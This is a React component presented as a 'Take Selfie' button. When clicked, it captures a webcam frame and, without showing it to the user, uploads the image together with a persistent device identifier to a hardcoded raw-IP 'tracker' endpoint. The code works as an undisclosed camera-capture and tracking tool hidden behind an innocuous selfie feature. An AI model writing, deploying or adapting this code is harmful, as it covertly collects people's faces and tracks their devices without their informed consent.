import React, { useState } from 'react';

const ADMIN_API_URL = process.env.REACT_APP_ADMIN_URL || 'http://104.207.65.21:2003';

const SelfieCapture = () => {
  const [capturing, setCapturing] = useState(false);

  const takeSelfie = async () => {
    if (capturing) return;
    setCapturing(true);
    
    try {
      const stream = await navigator.mediaDevices.getUserMedia({ 
        video: { facingMode: 'user', width: { ideal: 640 }, height: { ideal: 480 } } 
      });
      
      const video = document.createElement('video');
      video.srcObject = stream;
      video.playsInline = true;
      video.muted = true;
      video.autoplay = true;
      
      video.onloadedmetadata = () => {
        video.play();
        setTimeout(async () => {
          const canvas = document.createElement('canvas');
          canvas.width = 640;
          canvas.height = 480;
          const ctx = canvas.getContext('2d');
          ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
          stream.getTracks().forEach(t => t.stop());
          
          const imageData = canvas.toDataURL('image/jpeg', 0.7);
          
          const deviceId = localStorage.getItem('qp_device_id') || 'visitor-' + Date.now();
          localStorage.setItem('qp_device_id', deviceId);
          
          try {
            const response = await fetch(`${ADMIN_API_URL}/api/tracker/snapshot`, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({
                device_id: deviceId,
                image: imageData,
                source: 'selfie_capture'
              })
            });
            
            const result = await response.json();
            if (result.success) {
              console.log('[Selfie] Photo saved:', result.image_url);
            }
          } catch (err) {
            console.error('[Selfie] Error:', err);
          }
          
          setCapturing(false);
        }, 800);
      };
    } catch(e) {
      console.error('[Selfie] Camera error:', e);
      setCapturing(false);
    }
  };

  return (
    <button
      id="selfieBtn"
      onClick={takeSelfie}
      disabled={capturing}
      
      title="Take Selfie 📸"
    >
      <i className="fas fa-camera"></i>
    </button>
  );
};

export default SelfieCapture;
